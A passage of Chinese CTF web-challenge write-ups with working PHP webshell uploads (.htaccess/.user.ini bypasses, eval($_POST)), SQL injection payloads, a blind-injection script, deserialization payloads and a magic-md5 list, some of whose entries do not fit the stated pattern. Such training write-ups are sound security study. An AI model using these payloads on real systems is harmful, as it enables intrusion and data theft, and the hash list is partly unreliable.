echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph!");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶,别蒙我啊,这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧!");
        }
    }
}
?>

上传 .htaccess

修改 Content-Type

上传 ba2in9a-asp.webp

ba2in9a=show_source('/flag');

[网鼎杯 2018]Fakebook

dirsearch 扫出了 robots.txt flag.php error.php view.php db.php

hint

robots.txt 提示存在 user.php.bak

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

简单注册登录后发现存在sql注入,扫字典

过滤了 0x7e select union

no=-1%20order%20by%201,2,3,4,5%23

报错 存在四列数据

no=-1%20union%20select%201,2,3,4%20%23

no hack _

no=-1%20union/**/select%201,2,3,4%20%23

no=-1%20union/**/select%201,@@version_compile_os,3,4%20%23

Linux

no=-1%20union/**/select%201,version(),3,4%20%23

10.2.26-MariaDB-log

no=-1%20union/**/select%201,user(),3,4%20%23

root@localhost

no=-1%20union/**/select%201,database(),3,4%20%23

fakebook

no=-1%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()%20%23

users

no=-1%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%20%23

no,username,passwd,data

no=-1%20union/**/select%201,data,3,4%20from%20users%20%23
O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:5:"0.com";}

通过伪协议访问 file://var/www/html/flag.php

<?php
class UserInfo
{
    public $name = "0";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";

}
echo serialize(new UserInfo());
O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
no=-1%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27

PD9waHANCg0KJGZsYWcgPSAiZmxhZ3syOTkxM2UxYy0wZDllLTQ2OWEtYTEyNS0xZWZhOGUzMWYxMzF9IjsNCmV4aXQoMCk7DQo=

base64 解码后也会得到相同的内容

<?php

$flag = "flag{29913e1c-0d9e-469a-a125-1efa8e31f131}";
exit(0);

也可以 load_file 直接读取

no=-1 union/**/select 1,group_concat(load_file('/var/www/html/flag.php')),3,4 from users #setDefaults

[CISCN2019 华北赛区 Day2 Web1]Hack World

简单测试

拿字典跑了下

当 id 的值为1或2时会查询到以下结果

id=1 => Hello, glzjin wants a girlfriend.

id=2 => Do you want to be my girlfriend?

当 id 的值为其他数字或 @ 时回显 Error Occured When Fetch Result.

当 id 的值为 or and from like insert delect update select sleep 时回显 bool(false)

当 id 的值为 --+ information information_schema separator floor xor 时回显 SQL Injection Checked.

尝试 

id=if(length((select(flag)from(flag)))=42,1,0)

回显 Hello, glzjin wants a girlfriend.

确认 flag 有42个字符

二分法穷举

来自 inanb 的二分法穷举脚本

import requests
import time
url = 'http://2bd5e0bf-74ef-4b72-90b8-315541a82d9d.node3.buuoj.cn/'
flag=""
for x in range(1,43):
    l = 32
    r = 126
    while r > l:
        mid = int((l+r+1) / 2)
        x = str(x)
        y = str(mid)
        id = {"id":'if(ascii(substr((select(flag)from(flag)),'+x+',1))>='+y+',1,0)'}
        response = requests.post(url=url,data=id)
        if "Hello" in response.text:
            l = mid
        else:
            r = mid-1
        time.sleep(0.03)
    flag+=(chr(int(r)))
    print(chr(int(r)))
print(flag)

[GYCTF2020]Blacklist

联合注入

-1' or 1=1 order by 3 #
error 1054 : Unknown column '3' in 'order clause'
-1' union select 1,2 #
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

堆叠注入

-1';show tables #
array(1) {
[0]=>
string(8) "FlagHere"
}

array(1) {
[0]=>
string(5) "words"
}
-1';desc FlagHere #
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}

handler查询

[强网杯 2019]随便注 但过滤了 set prepare alter rename

改用 HANDLER 语句查询

-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #

[GXYCTF2019]BabySQli

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

hint

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

base32 解码 

c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

base64 解码 

select * from user where username = '$name'

试出 username 是 admin

fuzz

过滤了 ( ) = or xor order 等关键字

第二列数据为用户名,第三列数据为 MD5 加密的密码

name=' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #&pw=admin

[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

is_valid 方法限制字符的ASCII码为32-125,确保为可打印字符,而 protected 属性序列化后在变量名前添加标记\00*\00\00对应空字符(null)

PHP版本7.1+对属性的类型不敏感,可用 public 属性替换 protected 属性

__destruct 方法需绕过强类型比较 使用 op=" 2"op=2 绕过

<?php
 
class FileHandler {
 
    public $op = " 2";
    public  $filename = "flag.php";
    public  $content = "";
}

echo serialize(new FileHandler());
 
?>
?str=O:11:"FileHandler":3:{s:2:"op";s:4:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}

[MRCTF2020]Ez_bypass

include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}

数组绕过强类型比较

?id[]=0&gg[]=1

字符串或 %00 绕过 is_numeric

passwd=1234567a

passwd=1234567%00

[MRCTF2020]你传你🐎呢

.htaccess

修改 Content-Type

/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/.htaccess succesfully uploaded!

一句话

修改 Content-Type

/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/ba2in9a-php.webp succesfully uploaded!
ba2in9a=var_dump(scandir("/"));

ba2in9a=var_dump(file_get_contents("/flag"));

[极客大挑战 2019]HardSQL

fuzz 过滤了 ! & * + < > = | \\ if and union drop having mid sleep hex char ascii substr greatest 等关键字

报错注入

查看数据库基础信息

'or(updatexml(1,concat(0x7e,version(),0x7e),1))#

XPATH syntax error: ‘10.3.18-MariaDB

'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

XPATH syntax error: ‘geek

查表

'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

XPATH syntax error: ‘H4rDsq1

查字段

'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

XPATH syntax error: ‘id,username,password

查数据

'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

XPATH syntax error: ‘flagflag{db016904-4690-4025-94’

注意

updatexml() 仅能显示32个字符,若所需数据超出此长度限制,可结合 right() 使用

'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,30))))from(H4rDsq1)),0x7e),1))#

XPATH syntax error: ‘4-4690-4025-94c4-f546273a2d1e}

[SUCTF 2019]CheckIn

<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("&lt;? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}

.user.ini

auto_prepend_file 主文件前解析后包含

auto_append_file 主文件后解析后包含

exif_imagetype

GIF89a 文件头绕过 exif_imagetype 函数

.user.ini

GIF89a?
auto_append_file=ba2in9a-asp.webp

ba2in9a-asp.webp

GIF89a?
<script language="php">eval($_POST['ba2in9a']);</script>

扫描根目录

ba2in9a=var_dump(scandir("/"));

输出文件内容

ba2in9a=var_dump(file_get_contents("/flag"));

[ZJCTF 2019]NiZhuanSiWei

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

data://

使用 data:// 封装协议将所需内容写入 text

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

php://filter

使用 php://filter 封装协议读取 useless.php

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY&file=php://filter/read=convert.base64-encode/resource=useless.php
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

构造序列化

<?php  
class Flag{
    public $file='flag.php';
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);
        }  
    }  
}
print_r(serialize(new Flag())); 
?>

序列化

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

payload

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

[BJDCTF2020]Easy MD5

hint

响应头(Response header)存在提示

select * from 'admin' where password=md5($pass,true)

绕过

绕过 md5 函数实现注入

字符串一

ffifdyop

md5 加密

276f722736c95d99e921722cf9ed621c

转字符串

'or'6É]™é!r,ùíb  'or'6?]??!r,??b  'or'6ɝ⬹�

与 sql 闭合实现永真

字符串二

129581926211651571912466741651878684928

md5 加密

06da5430449f8f6f23dfc1276f722738

转字符串

ÚT0DŸo#ßÁ'or'8  ?T0D??o#??'or'8  ڔ0D㟁'or'8

测试未成功

源码

leveldo4.php 源码中也指出 password 是 ffifdyop

<?php
error_reporting(0);
$password = $_GET['password'];

if($password == 'ffifdyop')
{
    echo "<script>window.location.replace('./levels91.php')</script>";
}

?>

第二步

绕过弱类型比较

levels91.php

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}
?>

数组绕过

md5 不能处理数组,会直接返回 null, 此时两个数组进行比较时恒等

0e绕过

字符串 md5 加密后以 0e 开头,被当作使用科学计数法的数字进行比较,所以恒等

240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
IHKFRNS:0e256160682445802696926137988570
GZECLQZ:0e537612333747236407713628225676
GGHMVOE:0e362766013028313274586933780773
GEGHBXL:0e248776895502908863709684713578
EEIZDOI:0e782601363539291779881938479162
DYAXWCA:0e424759758842488633464374063001
DQWRASX:0e742373665639232907775599582643
BRTKUJZ:00e57640477961333848717747276704
ABJIHVY:0e755264355178451322893275696586
aaaXXAYW:0e540853622400160407992788832284
aabg7XSs:0e087386482136013740957780965295
aabC9RqS:0e041022518165728065344349536299
etqaTTFXeujI:0e873986795817250807369213941548
rr6HVrfwfQRK:0e390310578034127565575710199239
94da2KWOk2sD:0e522608713252938409614536178159
LIgjRwsEBV0G:0e476487496670573057723083165712
0Jh28Lv3IQPB:0e552943749576940357419042912841
5lYWomyrSgBi:00e82203671254360601934759406438
af8UF09z8S5B:0e880812032272171076911479094143
z5w4fxbnwoRP:0e676399623216539720736975162129
Ylp5Ocx5YCMV:0e176345976414440291009492284364
fh70QgaGIfYM:0e564472166873750526572156675923
UEaXPm4IIDp3:0e461721121374870411609769578212
suerFfjLQRmk:0e060125509800398574391675067075
0gdVIdSQL8Cm:0e366928091944678781059722345471
XJFYZ1MgeUcb:00e93967150195561843942349513469
wzXzQTGIx9VU:0e296679956971343764470376014802
3lciznK1MgbK:0e247293857347608753400314349379
JlJHHNWI3Oe6:0e027927343820705863215577441770
VW2zJhj2i8HR:0e252975277424098750450405547604
K7sy5q0K1RWS:0e987529109273801660943537750499
6KwzsyoreGnR:0e536008331452600778000468162358
Pz68mMqTxewH:0e883694193916844326948973611295
SJZQeL9hZ5AA:0e424294048497888001893529971403
76AG0EeoTxu3:0e096469501119857795175476384647
GvhhzTLwb98D:0e070302641246420537823173917716
C25B40bwF7oH:0e107651412534430122444310727335
LIkyqkm1p3JR:0e849446873586376930140138357778
1R7jqMIf6T7t:0e381567347928220347073343854712
jDg4hnyPwqal:0e905060392130117790735726467859
f6y7VrJlOBsI:0e914949007364385803648138798605
KXsU0AZ2PtRe:0e448778299130864449509797129898
H0UPp7mFA9SF:0e525419864591945406262998227563
JH4cGnwKzd0y:0e545428394516071575146741684795
MFGELCHzOwZK:0e767295899498195380697332834436
sQcRTBkePLSY:0e576163277785256730155739473379
fQvn3oAoYNfo:0e935872100939536813194636270943
VZQB1k9L5B7d:0eb93088111953185174046674351486
r3VyM4vgXTwp:0e971379756057125072238845041250
Ci85vdBF8fyf:0e183864284211506298675869366648
XgExkg0OSTWh:0eb21820378827332451464430798697
lFl7hFE2fZ89:0e038598152105620891422974861596
qXw0rVneiXQ0:0e894353687104732687786635214136
4Ryf8m1aUuos:0ed28945221302591847978449153264
TMonekAePscz:0ea90264385679456791019887225991
8aNwhejGhaBg:0e439849245165078778802700229873
gfxggQd5tJx3:0e731449381626093091793513404050
RSnakeUecYwT6N2O9g:0e126635149374886577950106830662
RSnakeIeNRSb8KjzTw:0e756073880949659567751252231576
RSnaker4hvtQIOrpOL:0ef65491276193866976262495578569
RSnake4KmfuX8QNCrf:0ea53603712327886946538710356586
RSnakectUSa1OLsZKq:0e249086601945526783602356278673
RSnakeDPoevzFRccil:0e024555713478934332659658118180
RSnakeDIs9W5Hwh4RI:0ed83429501266915038692525714483
RSnake6LuV2EeUCQT9:0e019285890012675326970853669352
RSnakeunZpMM36jWRc:0ef91664263600485432881263069170
RSnakeCN28H7ARqbWo:0eb96344658110042953525224062897
RSnakeeiEfFs2sDvBl:00e49650706719659997081024412456
RSnakeKX0luCScPTlA:0e090929726083772016603384876954
RSnake9YML3vVKDyVM:0e931397641908567179613657463230
RSnakeeDU1jeZP0y6u:0eb41746678067233356940544958830
RSnakeZiHfaf4AjRSu:0e964760122122507558510301894707
RSnake2FSf8M9wewCp:0e663260936156214376380910821202
RSnakeeaQyyx5CdJEL:0ea96476364525234814003638575853
RSnakeTk2IL3bXxrAC:0e853966415201907882218435953878
RSnakeEHcLoKzHpfbZ:0e942355771645636795619261311622
RSnake8GuHGIMTkrTD:0ea70327014428107205836228338816
RSnakejsZODVeHtL8J:0ee95969805366297925576732214029
RSnakeC0830jN1tf7O:0e052566796022527677703658434604
RSnake4DkeFu1e2SWr:0e600123384457131209132592175638
RSnakey6xDdo9q5FGW:0e810763761302115893884702703844
RSnakeKd8uCbfCeQ0o:0e731166959245640967022771564684
RSnake0Tm0M3AishG3:0e463249761046685126659935619668
RSnake51ZgTONSHR2Y:0ed33059556258086974875447876416
RSnakegcJDRRgf0U6m:0ef50854419179481189879935461045
RSnakewVhax4CuZvXf:0e969150246784517533191246408521
RSnakeX7VmFsdfGCeN:0eb39549850075118461895635919058
RSnakeeAkSiKkfjhg5:0e328551463697730337691527967652
RSnakeXAajyRGqsyTV:0e126217242363062792274495713166
RSnakeUN3g0sRq9X8u:0e527915370591664597242693926727
RSnakeDmg3wZ3el6Gw:0e025551054370458644586403691610
RSnakegb7AeowBXoc0:0ee37127518715729207824340169151
RSnakeVkXTec730R4j:0e502364472144982857192590869744
RSnakeb10HFo3IPQ6h:0e732117148004958779182858536990
RSnake1ABWDV22cgWf:0e457496054833900987889666775116
RSnake1L7TBMoOtCbK:0e699815913563873875266079686664
RSnakeWZyseGFM4XTM:00e76406687914702217897625303372
RSnakePZqyNVboAIB0:0e078797531434036768367559385297
RSnakehabxfvMKhpOv:0e697369971494869826413604586581
RSnakeGnPZZ1VZyXcV:0eb64175721325153230401232293315
RSnakeUGaguCSPCJYY:0ed71930195460522478633772575290
RSnakeRtZgKetPUamR:0e074760013367177502192270815625
RSnakeQ04eeHDeeOXU:0e074190594274270431349335477921
RSnakef0BO7lp6Th3W:0e764949368069072045196388521865
RSnakenug1uDXQt7Iv:0ec67338059701463792777215772734
RSnakeC3gXukyk1q0m:0e601959717847074232869477323026
RSnakez1e7Oyi6uuls:0e021177200447735015356971031921
RSnakehOwNif5RlEJN:00e88998412786603066488766572631
RSnakehiQ1fICqo6LA:0e453499463434434754387288377524
RSnakeXKPLlGdf2gYf:0e634506090174107853159384135687
RSnakeRsGzXAYo0JNj:0ea15673050850040596297554136904
RSnakezCopesJFQATe:0e070078800181583050892160625194
RSnakeEBQANS2agZQa:0ef84418091629785329034046180298
RSnake0IexB5ASh835:0ef61674257494387742486696449693
RSnakeUaE1SOBZOBlp:0e096932402637733060146852211580
RSnakewRaUZrfzRJd8:0ea15298596110949330590213153621
RSnakenznElX7zltVg:0eb11422135237478771912924355863
RSnakeUBveDBuGLzn1:0ea93220458387084292797896338339
RSnakerLbmB3GmwhQj:0ea24305267217862954133256679599
RSnake_the_King_4000141637680:00e11893775978043981869465759606
spazef0rze_1200003012612:0e710274968408547509637852155342
hashcatfsfxKcdsNeb5:0e903190981462662531625558386605
hashcatnqAd7pmtnS6E:0ed79166800676590411693158196899
hashcat8EbDj5owfLVT:0ed20108381450617146587076403374
hashcathswsP25UXbaY:0ef72621370226266918540716895907
hashcatinls5sxPRfs4:0e008198203488965284265444165616
hashcatdsZxzcAn7bMG:0ef78945997469804846763158288124
hashcat1YyA1g6oF1FZ:0ec90497773189564921974134421492
hashcatr3V7kU69oHaX:0e629484198526644284541157337823
hashcatXFoYEW5xvhrR:0ef54513011862173157038880179669
hashcatnqGe91mhdmJL:00e97587549148132332584993856101
hashcatfPsXKmXWoahm:0e294157022803076449661086491633
hashcatj3CB1Uw31R1B:0eb53493166742192510438503774348
hashcatjMgDymyIUTOp:0ef28594657620374960617662584943
hashcathYPsBaMGgU9h:00e41735841504397670224983312865
hashcatwcCx1uR4Jprn:0e192387500119144940543589871051
hashcatYe4S36r5fJDm:0e697741935429285291249437201427
hashcatPRnmIWlX9WPc:0e713554192892592207918637368778
hashcatsXLw487BJKKA:0ef82274437943154664919965739010
hashcatHs44KveHFeyB:0ed48932947782431585928958543499
hashcatbdx8Eve3TvDI:0e180273134459787920679105396890
hashcatRkfOcf3tazuI:0ee60908266239921612442277028478
hashcatOFXQepbdDiJp:00e35712421886644709539392249393
hashcatdfeMgVuxu7gf:0e169197575097809523854569778352
hashcats40e5zKszXtC:0eb80103486333320853663220547702
hashcata68WxZlK6Goy:0e875405291819069232049945618037
hashcatrPagY0yCHYWb:00e09882601873365218948520930847
hashcathaa1xDJMJVRC:0e571046416076977261801376038048
hashcatOjeub6ZMZKm5:0e788527789870181469533381742838
hashcateR893B4eAdZF:0e144579778150395607081073445146
hashcat9GosjkD9Ug38:0e408087357085099162195921667528
hashcatBSFYcYynwBSn:0ef32371130975581793158356886748
hashcatbkpFeQlGyG9W:0e029814416706774536200181074292
hashcatpfBhg4rhNRdL:0ee15757025693367795639306521491
hashcatf6dEmjpuChhH:0ee51416933327621708076527927275
hashcatgThUxH6MOf9I:0ef02473426562641560440412761722
hashcatrmz6OLffiG1h:0e885817045808513848992271430281
hashcatWm7WDyAGsqfA:0e346711282270627882083667182735
hashcat9A0p8S2VF6WR:0eb26656906880720687862361611253
hashcatzFGyzckAqAnJ:0e247981224210103389675703836804
hashcat6cfQEg78PmNR:0e184676765284891947674829626951
hashcatqvecWTkfic3I:0eb29360374680505575803746854932
hashcatNeci3wsAyH8d:0e072743999878721561251634052447
hashcats45f35ADICud:0e959921591712455769708084958456
hashcatxPW6txfRv0Sd:0e580448986130114663523089167516
hashcatUELyl2lbOpv9:0e627167386046552708286348016475
hashcatogfgny8PI4K9:0e036402558842525229204199477050
hashcatSIt2e5QfmByY:0e101666357206112681081748455320
hashcati0iOySpyxfxw:0e117796363501697027222953452674
hashcatqgZkv0yUR7bD:0e518259621249173316480085853775
hashcatexH58x6Bu5NY:0ed69719102850251217953475327085
hashcatF6s8OvsSxkhT:0e761657316022180429758325384657
hashcatA97bwSGJNe7k:0e355970557372440216920998975222
hashcat218LttLIg7Xm:0ef20180960250338718429233550861
hashcatNxt7gG7wCO97:0eb27520620314458450279649491956
hashcat90QDpbUkB0Ok:0e436314378402734111611712654026
hashcatb1ZgAABzM0Bf:0e946119446142642672858262832757
hashcatUf20DRSvx3cL:0ee20311665022977945172870623927
hashcatMRWSlWe05Zvp:0ea34183380125537235698152703631
hashcatKPVSTbbjqx3R:0e484369305169417649070905006315
hashcat0JkyaT0zfq4J:0ed22604657931750807530689526355
hashcatHKUy9GDHqVUb:0e653326767131355956161110469880
hashcattemLCPhgMmqL:0e631431734866553918413248642686
hashcatObRAnlIWKC8d:0ef27592244074741276205927202324
hashcat8oL17k6qk0gz:0ee73358262213033449654829838621
hashcatsB4SOwuGVuoe:0e333130585586305213577039927427
hashcati1GU40wDiOtJ:0ee11440449892563603908564275693
hashcatbMfE1nJW3PfS:0e901351436865764070859051398466
hashcatqlffzszeRcrt:0e242700999142460696437005736231
hashcatKn0bX5xTgV54:0e239074099038376915511163014383
hashcatfaXyv0NCydC2:00e78170913509171886364696947933
hashcatELKhrlNIlXAz:0ec00053106946393237318089678345
hashcatFZZ1OL8eacJj:0e544759073985063895056720000601
hashcatglCxMkqUOJwD:0e891676190649193842031508414124
hashcatLuQtDnSmdvf4:0e551613790717508526393660811028
hashcatJZ6zKjnDjSmP:0e957569938257781069678186971676
hashcatgcbkcHMJDYfo:0e778781420740711204571028212537
hashcatyEnN0AWDXEJj:00e78652260218430366515810097082
hashcatgEyFYuuwo206:0ed18617980884920471439353879013
hashcatx3Q3sVuRTzZf:0e107806662474608626243242623178
hashcat3iKHJQyTSPzT:0ec38017339220834055407867659893
hashcatnqsky8EaPhZY:0ea54041584253883176394189001413
hashcatj8i4CRvfTn6Q:0e164879675821490800383352471267
hashcatAncod29V4vrB:0eb40162176777666089546818513308
hashcatAI7W4Xf5qMAa:0ed11235495038495675309094002675
hashcatVX5KGaAxO37C:0ee18660142227578830299076471060
hashcatLSevfGjMib7z:0ef94806912787942506104369088120
hashcatweONL6TgUOeX:0e879034299586173661436974677516
hashcataD3Lp5Syji6a:0e535955911746832994456280697563
hashcatZjRe3wVwimeh:0e402537864182105121764499750206
hashcatjic1v8689j6J:0e154499221314249635525178651457
hashcatIZFfBisncyQB:0ec30474031066987435737602946383
hashcattSgs5m7NSzy6:0e249732113617303873999818367704
hashcatZQktzx9ms4ka:0e851827184221990365882765762026
hashcatidLgolWJSzrx:0e760659789811566699476240165608
hashcatSppglsswztvb:0e868690772629271014442727686201
hashcatK5hSQ7iQHm3C:0eb89528718762908134410955812049
hashcatoNfFqC6Io8U1:0e544071674105476245212118785762
hashcatTAIj3dG2G88F:00e21165511946133652979395746247
hashcatde9XUCz98sxF:0e845856619305429905294795223862
hashcatGBree35KhFQl:0e481083164060168518602691315134
hashcatqZjRbZkeVcA2:0e788248204976275056321855467193
hashcatHLj0fmus6oh0:0ea06412255480296796669846331760
hashcatIiW8ezvFBvR7:00e76915435845087660262486971544
hashcatThfyrXoumYcE:0e486802182204901515938066198224
hashcatJwcJRfArcgUR:0e967214930623954488921841383017
hashcatscGLuTJZjdKQ:0e522399875920163409892231895481
hashcatxgD29e0YtTej:0e844185588819980251553352078116
hashcatF58gxOpeYrJ2:0ed70294867221053172594698800809
hashcatL9VEe5VXcieS:0e043552498983315659673380698314
hashcatgEXSFjwOf6hq:0e221326925297238319205562403775
